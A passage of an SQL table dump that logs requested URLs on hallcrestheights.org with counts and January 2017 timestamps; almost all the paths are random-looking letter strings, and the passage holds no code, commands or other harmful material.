00:00:00'),(3288,'http://www.hallcrestheights.org/k5380-ixnmueah-i20162636-whioz-hjxbnwpg-eyooayi-kuks.htm',NULL,'','',1,0,'2017-01-08 20:09:07','0000-00-00 00:00:00'),(3289,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai/imjz-fozgdvd-dqjvdob-knlyk-i20162636-conedw-jmax-evortbzq-k10199-saxidihg/',NULL,'','',1,0,'2017-01-08 20:09:50','0000-00-00 00:00:00'),(3290,'http://www.hallcrestheights.org/k14020-mrcqgbei-fuwgr-i20162632-abtnwyrq-semgwko-whme.htm',NULL,'','',1,0,'2017-01-08 20:10:47','0000-00-00 00:00:00'),(3291,'http://www.hallcrestheights.org/ryvhr-k26614-hmqt-yysl-lgeajanp/dmefnxhq-i20162633-fhjdyh-aoxrc-jhwuvd-svezy.htm',NULL,'','',1,0,'2017-01-08 20:11:35','0000-00-00 00:00:00'),(3292,'http://www.hallcrestheights.org/i20162637-ixnmueah-whioz-hjxbnwpg-eyooayi-k60240-kuks-szqce-baqdom-ytni-holbdent-afymluze-xtlfgg.htm',NULL,'','',1,0,'2017-01-08 20:11:53','0000-00-00 00:00:00'),(3293,'http://www.hallcrestheights.org/gnfzn-xvjx/i20162637-palt-itjshkyj-k10834-yldpijaa.htm',NULL,'','',1,0,'2017-01-08 20:12:52','0000-00-00 00:00:00'),(3294,'http://www.hallcrestheights.org/k37420-mrcqgbei-fuwgr-i20162632-abtnwyrq-semgwko-whme.htm',NULL,'','',1,0,'2017-01-08 20:13:23','0000-00-00 00:00:00'),(3295,'http://www.hallcrestheights.org/gnfznx-vjxpal-i20162634-titjsh/kyjy-ldpija-amdurt-k51966-aenpg-gwtdvlx.htm',NULL,'','',1,0,'2017-01-08 20:13:32','0000-00-00 00:00:00'),(3296,'http://www.hallcrestheights.org/i20162632-htxwhy-krsvsvhu/dykb-k29339-qxdos/',NULL,'','',1,0,'2017-01-08 20:14:10','0000-00-00 00:00:00'),(3297,'http://www.hallcrestheights.org/tkuykf-k35949-jdnjjbuc-yupa-i20162629-jaylr-lwfv-dyruqpk-lsdefhx-dfpdf-ufpfaj-npvz-attuxdwv/',NULL,'','',1,0,'2017-01-08 20:17:01','0000-00-00 00:00:00'),(3298,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-itjshkyj-yldpijaa-i20162637-mdurta-k1084-enpgg.htm',NULL,'','',1,0,'2017-01-08 20:17:16','0000-00-00 00:00:00'),(3299,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-vtzpx-bxkc-wjybtyl-i20162636-wosduie-qgwso-gxhgpi-k10149-sdht/',NULL,'','',1,0,'2017-01-08 20:17:22','0000-00-00 00:00:00'),(3300,'http://www.hallcrestheights.org/k25180-jgletkym-i20162636-drqzn-rvmlkswa-zvkecqq-neei.htm',NULL,'','',1,0,'2017-01-08 20:19:12','0000-00-00 00:00:00'),(3301,'http://www.hallcrestheights.org/k37555-htxw-hykrsvs/vhudykb-qxdos-i20162629-fiety/',NULL,'','',1,0,'2017-01-08 20:20:24','0000-00-00 00:00:00'),(3302,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-i20162632-osqx-oqkgq-aqyd-cptznzv-tjqoevp-caqwj-aluwty-k61089-bckb/',NULL,'','',1,0,'2017-01-08 20:20:51','0000-00-00 00:00:00'),(3303,'http://www.hallcrestheights.org/bsoapa-zapstasg-mhcq-cmckf-i20162632-rdtf-k29489-kgpvbch/',NULL,'','',1,0,'2017-01-08 20:20:55','0000-00-00 00:00:00'),(3304,'http://www.hallcrestheights.org/i20162628-pcsc-qrufunp-k27542-kwxpo-ideotw/tvsoarm-osmgepla-lheliyr-qiyqfufx-vugo-wopegtqa-mzimczjv-hohtedh.htm',NULL,'','',1,0,'2017-01-08 20:21:33','0000-00-00 00:00:00'),(3305,'http://www.hallcrestheights.org/k47500-ixnmueah-whioz-hjxbnwpg-eyooayi-i20162634-kuks.htm',NULL,'','',1,0,'2017-01-08 20:23:23','0000-00-00 00:00:00'),(3306,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb-qxdos-fiet-yuaixnr-bdggsaa-rhefs-kjydmr-i20162629-k26349-ujwi/',NULL,'','',1,0,'2017-01-08 20:25:04','0000-00-00 00:00:00'),(3307,'http://www.hallcrestheights.org/k57220-lugdltrs-mxxhy-i20162632-pzqjllzo-hnjumnt-ecwf.htm',NULL,'','',1,0,'2017-01-08 20:29:06','0000-00-00 00:00:00'),(3308,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-i20162632-ikvf-vtzpx-bxkc-wjybtyl-wosduie-qgwso-gxhgpi-k59289-sdht/',NULL,'','',1,0,'2017-01-08 20:31:04','0000-00-00 00:00:00'),(3309,'http://www.hallcrestheights.org/k26080-edzvdlqc-i20162636-omnnm-mcawvbfu-japyvrl-flxh.htm',NULL,'','',1,0,'2017-01-08 20:34:53','0000-00-00 00:00:00'),(3310,'http://www.hallcrestheights.org/wbwpbon-i20162631-kydhx-jjikvf-k6873-vtzpxb-xkcwj-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn/',NULL,'','',1,0,'2017-01-08 20:37:04','0000-00-00 00:00:00'),(3311,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr-glnik-ghhm-i20162635-bbxpges-mrcaizt-biauw-dtvixp-k38949-mtzh/',NULL,'','',1,0,'2017-01-08 20:38:59','0000-00-00 00:00:00'),(3312,'http://www.hallcrestheights.org/k59740-gnfznxvj-xpalt-i20162637-itjshkyj-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-08 20:42:56','0000-00-00 00:00:00'),(3313,'http://www.hallcrestheights.org/k51820-edzvdlqc-i20162631-omnnm-mcawvbfu-japyvrl-flxh.htm',NULL,'','',1,0,'2017-01-08 20:44:56','0000-00-00 00:00:00'),(3314,'http://www.hallcrestheights.org/k18340-zmkuedtz-jivyo-qxifgxuh-i20162628-xptvuhm-iwnz.htm',NULL,'','',1,0,'2017-01-08 20:46:56','0000-00-00 00:00:00'),(3315,'http://www.hallcrestheights.org/k16720-edzvdlqc-omnnm-i20162632-mcawvbfu-japyvrl-flxh.htm',NULL,'','',1,0,'2017-01-08 20:50:13','0000-00-00 00:00:00'),(3316,'http://www.hallcrestheights.org/jglet-k51934-kymd-rqzn/rvmlkswa-i20162636-zvkecqqn-eeiaqj-zlnpl.htm',NULL,'','',1,0,'2017-01-08 20:53:05','0000-00-00 00:00:00'),(3317,'http://www.hallcrestheights.org/wbwpbo-k60589-nkydhxjj-ikvf-vtzpx-i20162632-bxkc-wjybtyl-wosduie-qgwso-gxhgpi/',NULL,'','',1,0,'2017-01-08 20:53:06','0000-00-00 00:00:00'),(3318,'http://www.hallcrestheights.org/nfrkopd-i20162631-obbum-golzes-k5973-rkwtzq-tqbsv-jcwj-bxnmyv-sssldj-znaahjb-kwxro/',NULL,'','',1,0,'2017-01-08 20:53:12','0000-00-00 00:00:00'),(3319,'http://www.hallcrestheights.org/htxwhyk-k46603-rsvsv-i20162630-hudykb-qxdosf/ietyu-aixn-rbdggs-aarhef-skjydmr/',NULL,'','',1,0,'2017-01-08 20:53:17','0000-00-00 00:00:00'),(3320,'http://www.hallcrestheights.org/k35620-fadlajfn-lgfpc-i20162632-vwgmyhde-cwxbdeu-dkov.htm',NULL,'','',1,0,'2017-01-08 20:53:27','0000-00-00 00:00:00'),(3321,'http://www.hallcrestheights.org/i20162637-jgletk-k33526-ymdrqz-nrvmlk-swaz/vkecqq-neeiaq-jzlnp-lqfcneb-xilnvox.htm',NULL,'','',1,0,'2017-01-08 20:53:32','0000-00-00 00:00:00'),(3322,'http://www.hallcrestheights.org/mrcqg-beif/k17114-uwgr-abtnwyrq-semgwkow-i20162633-hmemxg.htm',NULL,'','',1,0,'2017-01-08 20:53:52','0000-00-00 00:00:00'),(3323,'http://www.hallcrestheights.org/vqjny-k16264-spvh-oljp-eurrtpil-uourxivl-i20162633-btrhnn-mtqzk-owtsxp-pbgrr.htm',NULL,'','',1,0,'2017-01-08 20:54:16','0000-00-00 00:00:00'),(3324,'http://www.hallcrestheights.org/qlbowc-i20162629-iggeceay/afxr-k4499-glnik/',NULL,'','',1,0,'2017-01-08 20:55:15','0000-00-00 00:00:00'),(3325,'http://www.hallcrestheights.org/k46780-mrcqgbei-i20162636-fuwgr-abtnwyrq-semgwko-whme.htm',NULL,'','',1,0,'2017-01-08 20:55:23','0000-00-00 00:00:00'),(3326,'http://www.hallcrestheights.org/ajqx-xucuzao-fifephi-i20162629-ijimj/k29055-njbog-tsakbcc-gyfm-dvjuxzle-ktsls-hxosqq-jvfyo/',NULL,'','',1,0,'2017-01-08 20:55:27','0000-00-00 00:00:00'),(3327,'http://www.hallcrestheights.org/ryvhr-i20162633-hmqt-yysl/lgeajanp-dmefnxhq-fhjdyh-k5814-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-08 20:55:54','0000-00-00 00:00:00'),(3328,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-wtvsoar-mosm-gepla-lheliy-rqiy-k50240-qfufxvug-i20162637-owopegtq-amzimc-zjvhoh.htm',NULL,'','',1,0,'2017-01-08 20:56:52','0000-00-00 00:00:00'),(3329,'http://www.hallcrestheights.org/oiyi-zgolrcm-wfbsnop-dgfnh-skrlj-k59145-rgfctfz-fiwx-wmakoayo-smpql-i20162629-gvegdf/',NULL,'','',1,0,'2017-01-08 20:57:19','0000-00-00 00:00:00'),(3330,'http://www.hallcrestheights.org/gnfz-k42112-nxvjxpa-ltitj-shkyjy-ldpijaa-mdurtaen-i20162634-pggwtdv-lxtdqkun-fglq.htm',NULL,'','',1,0,'2017-01-08 20:58:03','0000-00-00 00:00:00'),(3331,'http://www.hallcrestheights.org/k46600-pcscqruf-unpkw-xpoideot-wtvsoar-i20162634-mosm.htm',NULL,'','',1,0,'2017-01-08 20:59:25','0000-00-00 00:00:00'),(3332,'http://www.hallcrestheights.org/i20162628-fadlaj-fnlgfp-k1976-cvwgmy-hdec-wxbdeu-dkovfi.htm',NULL,'','',1,0,'2017-01-08 21:03:03','0000-00-00 00:00:00'),(3333,'http://www.hallcrestheights.org/ixnmu-eahw-k284-hioz-i20162637-hjxbnwpg-eyooayik-uksszq.htm',NULL,'','',1,0,'2017-01-08 21:07:05','0000-00-00 00:00:00'),(3334,'http://www.hallcrestheights.org/ixnmu-eahw-k284-hioz-hjxbnwpg-eyooayik-i20162633-uksszq.htm',NULL,'','',1,0,'2017-01-08 21:15:10','0000-00-00 00:00:00'),(3335,'http://www.hallcrestheights.org/soegs-k12457-zxyife-tvtnd-yuuh-vfcyzls-xxqroxae-hkskxyxe-i20162635-mbuqudt-wqceyvuc/',NULL,'','',1,0,'2017-01-08 21:19:17','0000-00-00 00:00:00'),(3336,'http://www.hallcrestheights.org/nfrk-i20162629-opdobbu-mgolzes-rkwtz-qtqbs-k15905-vjcwjbx-nmyv-sssldjzn-aahjb-kwxros-holvg-wxkwoih/',NULL,'','',1,0,'2017-01-08 21:20:13','0000-00-00 00:00:00'),(3337,'http://www.hallcrestheights.org/pcsc-qrufunp-i20162628-kwxpo-ideotw/tvsoarm-osmgepla-lheliyr-qiyqfufx-k48342-vugo-wopegtqa-mzimczjv.htm',NULL,'','',1,0,'2017-01-08 21:20:54','0000-00-00 00:00:00'),(3338,'http://www.hallcrestheights.org/cwhr-i20162629-iwgpekz-qdwkvum-zbsai/imjzf-ozgdvdd-qjvd-obknlykc-onedw-jmaxev-ortbz-k18155-qsaxidi/',NULL,'','',1,0,'2017-01-08 21:22:25','0000-00-00 00:00:00'),(3339,'http://www.hallcrestheights.org/i20162630-tkuykfj-dnjjb-ucyupa-k36573-jaylrl-wfvdy-ruqp-klsdef-hxdfpd-fufpfaj-npvza/',NULL,'','',2,0,'2017-01-08 21:23:18','0000-00-00 00:00:00'),(3340,'http://www.hallcrestheights.org/edzvdl-i20162635-qcomnn-k20516-mmcawv-bfuj-apyvrl-flxhqj.htm',NULL,'','',1,0,'2017-01-08 21:25:24','0000-00-00 00:00:00'),(3341,'http://www.hallcrestheights.org/i20162634-mrcqgb-eifuwg-k41216-rabtnw-yrqs-emgwko-whmemx.htm',NULL,'','',1,0,'2017-01-08 21:27:15','0000-00-00 00:00:00'),(3342,'http://www.hallcrestheights.org/i20162634-zmkued-tzjivy-k61916-oqxifg-xuhx-ptvuhm-iwnzko.htm',NULL,'','',1,0,'2017-01-08 21:29:46','0000-00-00 00:00:00'),(3343,'http://www.hallcrestheights.org/htxwh-k53857-ykrsvs-vhudy-kbqx-dosfiet-yuaixnrb-i20162634-dggsaarh-efskjyd-mrujwimj/',NULL,'','',1,0,'2017-01-08 21:31:18','0000-00-00 00:00:00'),(3344,'http://www.hallcrestheights.org/vqjny-spvh-k1184-oljp-i20162637-eurrtpil-uourxivl-btrhnn.htm',NULL,'','',1,0,'2017-01-08 21:34:26','0000-00-00 00:00:00'),(3345,'http://www.hallcrestheights.org/cwhri-k33157-wgpekz-qdwkv-umzb-saiimjz-fozgdvdd-i20162634-qjvdobkn-lykcone-dwjmaxev/',NULL,'','',1,0,'2017-01-08 21:35:25','0000-00-00 00:00:00'),(3346,'http://www.hallcrestheights.org/ixnmue-ahwhio-k44276-zhjxbn-i20162637-wpge-yooayi-kukssz.htm',NULL,'','',1,0,'2017-01-08 21:37:20','0000-00-00 00:00:00'),(3347,'http://www.hallcrestheights.org/lugdlt-rsmxxh-k23576-ypzqjl-i20162637-lzoh-njumnt-ecwfog.htm',NULL,'','',1,0,'2017-01-08 21:39:22','0000-00-00 00:00:00'),(3348,'http://www.hallcrestheights.org/mrcqg-beif-i20162636-k41684-uwgr-abtnwyrq-semgwkow-hmemxg.htm',NULL,'','',1,0,'2017-01-08 21:41:22','0000-00-00 00:00:00'),(3349,'http://www.hallcrestheights.org/ajqxxuc-uzaof-ifephi-i20162631-ijimjn/jbogt-sakb-ccgyfm-dvjuxz-lektsls-hxosq-qjvfy-k60203-oihttjpu/',NULL,'','',1,0,'2017-01-08 21:43:44','0000-00-00 00:00:00'),(3350,'http://www.hallcrestheights.org/yembjvh-tqqdc-i20162630-kzfltz-terqbw/nswns-njpl-pftrrj-ncypjo-qwgzjev-ihsdp-acayl-k47603-hyayzeue/',NULL,'','',1,0,'2017-01-08 21:44:36','0000-00-00 00:00:00'),(3351,'http://www.hallcrestheights.org/wbwp-i20162629-bonkydh/xjjikvf-k18755-vtzpx/',NULL,'','',1,0,'2017-01-08 21:45:14','0000-00-00 00:00:00'),(3352,'http://www.hallcrestheights.org/upttm-nbea-i20162636-k32504-tgrb-nqcdcncx-rdhcpgzz-dllimv.htm',NULL,'','',1,0,'2017-01-08 21:45:25','0000-00-00 00:00:00'),(3353,'http://www.hallcrestheights.org/qlbowci-ggece-k35023-ayafxr/glnikg-hhmbb-i20162630-xpge-smrcai/',NULL,'','',1,0,'2017-01-08 21:46:00','0000-00-00 00:00:00'),(3354,'http://www.hallcrestheights.org/qlbowc-iggeceay-afxr-glnik-i20162632-ghhm-k39989-bbxpges-mrcaizt-biauw-dtvixp-mtzh-zzwzrqrd-cfpsmfwa/',NULL,'','',1,0,'2017-01-08 21:46:47','0000-00-00 00:00:00'),(3355,'http://www.hallcrestheights.org/nfrkop-dobbumgo-lzes-rkwtz/i20162632-qtqb-svjcwjb-xnmyvss-sldjz-naahjb-kwxr-osholvgw-k39539-xkwoihom/',NULL,'','',1,0,'2017-01-08 21:47:31','0000-00-00 00:00:00'),(3356,'http://www.hallcrestheights.org/yembjv-i20162635-htqqdckz/fltz-terqb-wnsw-k38399-nsnjplp/',NULL,'','',1,0,'2017-01-08 21:48:28','0000-00-00 00:00:00'),(3357,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb/k36099-qxdos-fiet-i20162629-yuaixnr-bdggsaa-rhefs/',NULL,'','',1,0,'2017-01-08 21:49:04','0000-00-00 00:00:00'),(3358,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm/k10734-vuclzuph-vqawuo-xzmnp-i20162637-zvsgcr-lycmc-zoqqelu.htm',NULL,'','',1,0,'2017-01-08 21:49:49','0000-00-00 00:00:00'),(3359,'http://www.hallcrestheights.org/bsoa-i20162629-k39655-pazapst-asgmhcq-cmckf/rdtfk-gpvbchs-iwho-rklvzrtj-rsyoa/',NULL,'','',1,0,'2017-01-08 21:50:35','0000-00-00 00:00:00'),(3360,'http://www.hallcrestheights.org/k59695-kzpf-fmsxklr/dedhwge-fvbbg-i20162629-zagpe/',NULL,'','',1,0,'2017-01-08 21:51:21','0000-00-00 00:00:00'),(3361,'http://www.hallcrestheights.org/qlbow-k54757-ciggec-eayaf-xrgl-nikghhm-bbxpgesm-i20162634-rcaiztbi-auwdtvi-xpmtzhzz/',NULL,'','',1,0,'2017-01-08 21:51:39','0000-00-00 00:00:00'),(3362,'http://www.hallcrestheights.org/oiyizg-k38449-olrcmwfb-snop-dgfnh-skrl-jrgfctf-zfiwxwm-i20162635-akoay-osmpql/',NULL,'','',1,0,'2017-01-08 21:52:36','0000-00-00 00:00:00'),(3363,'http://www.hallcrestheights.org/xhaj-i20162629-k49805-vqlwczb-iqsosqx-oqkgq/',NULL,'','',1,0,'2017-01-08 21:52:54','0000-00-00 00:00:00'),(3364,'http://www.hallcrestheights.org/pcscq-rufu-i20162636-k53204-npkw-xpoideot-wtvsoarm-osmgep.htm',NULL,'','',1,0,'2017-01-08 21:53:28','0000-00-00 00:00:00'),(3365,'http://www.hallcrestheights.org/k10066-upttmn-beatgr-bnqcdc/i20162635-ncxr-dhcpgz-zdllim-vyxjl.htm',NULL,'','',1,0,'2017-01-08 21:53:40','0000-00-00 00:00:00'),(3366,'http://www.hallcrestheights.org/i20162632-wbwpbo-nkydhxjj-ikvf-k29389-vtzpx-bxkc-wjybtyl-wosduie/',NULL,'','',1,0,'2017-01-08 21:54:22','0000-00-00 00:00:00'),(3367,'http://www.hallcrestheights.org/qlbowc-i20162629-iggeceay/afxr-glnik-ghhm-k35699-bbxpges/',NULL,'','',1,0,'2017-01-08 21:55:13','0000-00-00 00:00:00'),(3368,'http://www.hallcrestheights.org/dvisc-k334-iwbv-wkux-krbzomsm/vuclzuph-i20162633-vqawuo-xzmnp-zvsgcr-lycmc.htm',NULL,'','',1,0,'2017-01-08 21:56:02','0000-00-00 00:00:00'),(3369,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-jaylr-lwfv-k38549-dyruqpk-lsdefhx-i20162635-dfpdf-ufpfaj-npvz-attuxdwv-peeklyzx/',NULL,'','',1,0,'2017-01-08 21:56:39','0000-00-00 00:00:00'),(3370,'http://www.hallcrestheights.org/ryvhr-hmqt-k42734-yysl-lgeajanp/i20162632-dmefnxhq-fhjdyh-aoxrc-jhwuvd-svezy-twlcycw-scpuakq-njtn.htm',NULL,'','',1,0,'2017-01-08 21:57:25','0000-00-00 00:00:00'),(3371,'http://www.hallcrestheights.org/yembjv-i20162629-htqqdckz/fltz-terqb-wnsw-k14999-nsnjplp/',NULL,'','',1,0,'2017-01-08 21:58:11','0000-00-00 00:00:00'),(3372,'http://www.hallcrestheights.org/lugd-ltrsmxx-hypzq-jllzoh-k53112-njumnte-cwfogywb-iwyrurf-i20162633-gvfcwqzh-ribn-knyfeebs-bjhfkwet.htm',NULL,'','',1,0,'2017-01-08 22:01:32','0000-00-00 00:00:00'),(3373,'http://www.hallcrestheights.org/edzvdlq-comnnmmc-awvbfuja-pyvrlfl-i20162632-xhqjku-hkcmu-mbhmgznk-ohey-k32528-rupxpu-dzik-muss-heqnr.htm',NULL,'','',1,0,'2017-01-08 22:05:28','0000-00-00 00:00:00'),(3374,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-i20162630-gmyhdecw-xbdeudk-ovfiib-ptquh-zxchhrmx-agfp-k37388-apuhgf-qvjd-clbb-vzgrc.htm',NULL,'','',1,0,'2017-01-08 22:15:08','0000-00-00 00:00:00'),(3375,'http://www.hallcrestheights.org/wbwpbon-k60303-kydhx-jjikvf-vtzpxb/xkcwj-i20162631-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn-irmjh/',NULL,'','',1,0,'2017-01-08 22:16:53','0000-00-00 00:00:00'),(3376,'http://www.hallcrestheights.org/qlbowc-i20162629-k5149-iggeceay-afxr-glnik-ghhm-bbxpges-mrcaizt-biauw-dtvixp/',NULL,'','',1,0,'2017-01-08 22:17:04','0000-00-00 00:00:00'),(3377,'http://www.hallcrestheights.org/bsoa-i20162629-pazapst-asgmhcq-cmckf/rdtfk-gpvbchs-iwho-rklvzrtj-rsyoa-ayfwgd-xskmy-k37055-ukcmbqr/',NULL,'','',1,0,'2017-01-08 22:17:37','0000-00-00 00:00:00'),(3378,'http://www.hallcrestheights.org/gnfzn-k21754-xvjx-palt-itjshkyj/yldpijaa-mdurta-enpgg-wtdvlx-i20162636-tdqku.htm',NULL,'','',1,0,'2017-01-08 22:18:18','0000-00-00 00:00:00'),(3379,'http://www.hallcrestheights.org/i20162630-kzpffms-xklrd-edhwge-k47553-fvbbgz-agpec-iyyu-wuvfzt-jigjin-amzbcng-tfmly/',NULL,'','',1,0,'2017-01-08 22:18:52','0000-00-00 00:00:00'),(3380,'http://www.hallcrestheights.org/lugdltr-smxxhypz-i20162630-qjllzohn-jumntec-wfogyw-biwyr-urfgvfcw-qzhr-k58988-ibnkny-feeb-sbjh-fkwet.htm',NULL,'','',1,0,'2017-01-08 22:18:58','0000-00-00 00:00:00'),(3381,'http://www.hallcrestheights.org/cwhriwg-pekzq-i20162630-dwkvum-zbsaii/mjzfo-zgdv-ddqjvd-obknly-kconedw-jmaxe-vortb-k46703-zqsaxidi/',NULL,'','',1,0,'2017-01-08 22:19:32','0000-00-00 00:00:00'),(3382,'http://www.hallcrestheights.org/gnfzn-xvjx-k52434-palt/itjshkyj-i20162636-yldpijaa-mdurta-enpgg-wtdvlx.htm',NULL,'','',1,0,'2017-01-08 22:20:16','0000-00-00 00:00:00'),(3383,'http://www.hallcrestheights.org/k49255-htxw-hykrsvs/vhudykb-qxdos-i20162629-fiety/',NULL,'','',1,0,'2017-01-08 22:20:54','0000-00-00 00:00:00'),(3384,'http://www.hallcrestheights.org/vqjny-i20162633-spvh/k27314-oljp-eurrtpil.htm',NULL,'','',1,0,'2017-01-08 22:21:34','0000-00-00 00:00:00'),(3385,'http://www.hallcrestheights.org/wbwp-bonkydh-xjjikvf-i20162629-k49305-vtzpx-bxkcw-jybtylw-osdu-ieqgwsog-xhgpi-sdhtni-rmjhv/',NULL,'','',1,0,'2017-01-08 22:22:14','0000-00-00 00:00:00'),(3386,'http://www.hallcrestheights.org/jgletk-ymdrqz-k9866-nrvmlk-swaz/vkecqq-neeiaq-jzlnp-i20162635-lqfcneb-xilnvox-bdjvee-bikptjv-lxfa.htm',NULL,'','',1,0,'2017-01-08 22:22:55','0000-00-00 00:00:00'),(3387,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-cmckf/rdtfk-k26655-gpvbchs-iwho-rklvzrtj-rsyoa-i20162629-ayfwgd/',NULL,'','',1,0,'2017-01-08 22:23:36','0000-00-00 00:00:00'),(3388,'http://www.hallcrestheights.org/ryvhrhm-qtyysllg-i20162630-eajanpdm-efnxhqf-hjdyha-oxrcj-hwuvdsve-zytw-k38288-lcycws-cpua-kqnj-tnply.htm',NULL,'','',1,0,'2017-01-08 22:28:51','0000-00-00 00:00:00'),(3389,'http://www.hallcrestheights.org/nfrkopd-k7273-obbum-golzes-i20162631-rkwtzq-tqbsv-jcwj-bxnmyv-sssldj-znaahjb/',NULL,'','',1,0,'2017-01-08 22:30:35','0000-00-00 00:00:00'),(3390,'http://www.hallcrestheights.org/bsoapa-i20162629-zapstasg/mhcq-k25199-cmckf/',NULL,'','',1,0,'2017-01-08 22:35:44','0000-00-00 00:00:00'),(3391,'http://www.hallcrestheights.org/xhajvq-lwczbiqs/i20162632-osqx-oqkgq-k29239-aqyd/',NULL,'','',1,0,'2017-01-08 22:36:35','0000-00-00 00:00:00'),(3392,'http://www.hallcrestheights.org/qlbo-wciggec-eayafxr-i20162629-glnik-ghhmb-bxpgesm-rcai-k7905-ztbiauwd-tvixp-mtzhzz-wzrqr/',NULL,'','',1,0,'2017-01-08 22:37:04','0000-00-00 00:00:00'),(3393,'http://www.hallcrestheights.org/qlbo-wciggec-i20162630-eayafxr-glnik/ghhmb-bxpgesm-rcai-ztbiauwd-tvixp-mtzhzz-wzrqr-k6995-dcfpsmf/',NULL,'','',1,0,'2017-01-08 22:37:44','0000-00-00 00:00:00'),(3394,'http://www.hallcrestheights.org/xhajvq-k38989-lwczbiqs-osqx-oqkgq-i20162632-aqyd-cptznzv-tjqoevp-caqwj-aluwty/',NULL,'','',1,0,'2017-01-08 22:38:25','0000-00-00 00:00:00'),(3395,'http://www.hallcrestheights.org/i20162635-gnfznx-k10366-vjxpal/titjsh-kyjy-ldpija.htm',NULL,'','',1,0,'2017-01-08 22:38:37','0000-00-00 00:00:00'),(3396,'http://www.hallcrestheights.org/soeg-szxyife-i20162630-tvtndyu-uhvfc-yzlsx-k17345-xqroxae-hksk-xyxembuq-udtwq-ceyvuc-iwqws-gfrvrjo/',NULL,'','',1,0,'2017-01-08 22:39:07','0000-00-00 00:00:00'),(3397,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-jshkyjyl-dpijaam-durtae-i20162633-npggw-tdvlxtdq-kunf-k10028-glqrhz-yonx-feqn-zsvvb.htm',NULL,'','',1,0,'2017-01-08 22:40:24','0000-00-00 00:00:00'),(3398,'http://www.hallcrestheights.org/jgletky-mdrqznrv-mlkswazv-kecqqne-i20162632-eiaqjz-lnplq-fcnebxil-nvox-k31628-bdjvee-bikp-tjvl-xfaye.htm',NULL,'','',1,0,'2017-01-08 22:42:11','0000-00-00 00:00:00'),(3399,'http://www.hallcrestheights.org/nfrkopd-k47053-obbum-i20162630-golzes-rkwtzq-tqbsv-jcwj-bxnmyv-sssldj-znaahjb/',NULL,'','',1,0,'2017-01-08 22:44:07','0000-00-00 00:00:00'),(3400,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr-bzomsmvu-clzuphv-i20162632-qawuox-zmnpz-vsgcrlyc-mczo-k30728-qqelud-pwcm-egia-pxmxi.htm',NULL,'','',1,0,'2017-01-08 22:46:03','0000-00-00 00:00:00'),(3401,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-gmyhdecw-xbdeudk-i20162632-ovfiib-ptquh-zxchhrmx-agfp-k51428-apuhgf-qvjd-clbb-vzgrc.htm',NULL,'','',1,0,'2017-01-08 22:53:48','0000-00-00 00:00:00'),(3402,'http://www.hallcrestheights.org/edzvdlq-comnnmmc-awvbfuja-pyvrlfl-xhqjku-hkcmu-i20162634-mbhmgznk-ohey-k25508-rupxpu-dzik-muss-heqnr.htm',NULL,'','',1,0,'2017-01-08 23:01:35','0000-00-00 00:00:00'),(3403,'http://www.hallcrestheights.org/i20162628-fadlajfn-lgfpc-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-k8840-mxagfpap-uhgfqvjd-clbbvz-grcmdf.htm',NULL,'','',1,0,'2017-01-08 23:03:28','0000-00-00 00:00:00'),(3404,'http://www.hallcrestheights.org/dvisciwb-vwkux-krbzomsm-vuclzup-i20162632-hvqa-wuoxz-mnpzvs-gcrl-k4520-ycmczoqq-eludpwcm-egiapx-mxikii.htm',NULL,'','',1,0,'2017-01-08 23:05:24','0000-00-00 00:00:00'),(3405,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-zvkecqq-i20162632-neei-aqjzl-nplqfc-nebx-k5420-ilnvoxbd-jveebikp-tjvlxf-ayeaya.htm',NULL,'','',1,0,'2017-01-08 23:09:16','0000-00-00 00:00:00'),(3406,'http://www.hallcrestheights.org/ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-ytni-k51140-holbdent-i20162637-afymluze-xtlfgg-csdimr.htm',NULL,'','',1,0,'2017-01-08 23:13:08','0000-00-00 00:00:00'),(3407,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-i20162635-fgvf-k16400-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-08 23:15:03','0000-00-00 00:00:00'),(3408,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-i20162631-zvkecqq-neei-aqjzl-nplqfc-nebx-k40520-ilnvoxbd-jveebikp-tjvlxf-ayeaya.htm',NULL,'','',1,0,'2017-01-08 23:19:01','0000-00-00 00:00:00'),(3409,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt-i20162632-ecwf-ogywb-iwyrur-fgvf-k46820-cwqzhrib-nknyfeeb-sbjhfk-wetbro.htm',NULL,'','',1,0,'2017-01-08 23:22:47','0000-00-00 00:00:00'),(3410,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm-i20162632-iwnz-korpv-ubfgnq-tpmh-k47720-prbikzon-mtlajhol-jrdklt-sqwxxu.htm',NULL,'','',1,0,'2017-01-08 23:26:39','0000-00-00 00:00:00'),(3411,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-wtvsoar-mosm-gepla-lheliy-i20162635-rqiy-k36200-qfufxvug-owopegtq-amzimc-zjvhoh.htm',NULL,'','',1,0,'2017-01-08 23:30:31','0000-00-00 00:00:00'),(3412,'http://www.hallcrestheights.org/upttmnbe-atgrb-nqcdcncx-rdhcpgz-i20162632-zdll-imvyx-jltfeo-bkeb-k45920-wivsmqkr-fbmlkmst-howgwh-lkjlbm.htm',NULL,'','',1,0,'2017-01-08 23:32:31','0000-00-00 